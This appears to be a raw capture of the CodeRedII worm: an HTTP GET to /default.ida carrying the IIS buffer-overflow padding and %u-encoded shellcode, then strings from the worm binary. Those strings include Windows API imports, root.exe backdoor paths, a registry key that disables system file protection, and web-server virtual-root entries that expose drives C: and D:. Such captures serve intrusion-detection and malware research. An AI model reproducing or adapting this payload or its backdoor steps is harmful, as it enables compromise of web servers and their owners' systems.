GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
Content-length: 3379

CodeRedII
F4)E Th~f Th~f ;MZu KERNu EL32u GetPu rocAu D$$dg
LoadLibraryA CreateThread GetTickCount Sleep GetSystemDefaultLangID GetSystemDirectoryA CopyFileA GlobalFindAtomA GlobalAddAtomA CloseHandle _lcreat _lwrite _lclose GetSystemTime
WS2_32.DLL socket closesocket ioctlsocket connect select send recv gethostname gethostbyname WSAGetLastError
USER32.DLL ExitWindowsEx
\CMD.EXE
d:\inetpub\scripts\root.exe
d:\progra~1\common~1\system\MSADC\root.exe
hT @ hH @ hX @ t6Ff %`0@ %d0@ %h0@ %p0@ %t0@ %x0@ %|0@
\EXPLORER.EXE
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SFCDisable
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots
/Scripts
/MSADC
c:\,,217
d:\,,217
KERNEL32.dll ADVAPI32.dll Sleep GetWindowsDirectoryA WinExec RegQueryValueExA RegSetValueExA RegOpenKeyExA RegCloseKey
d:\explorer.exe
8>u'j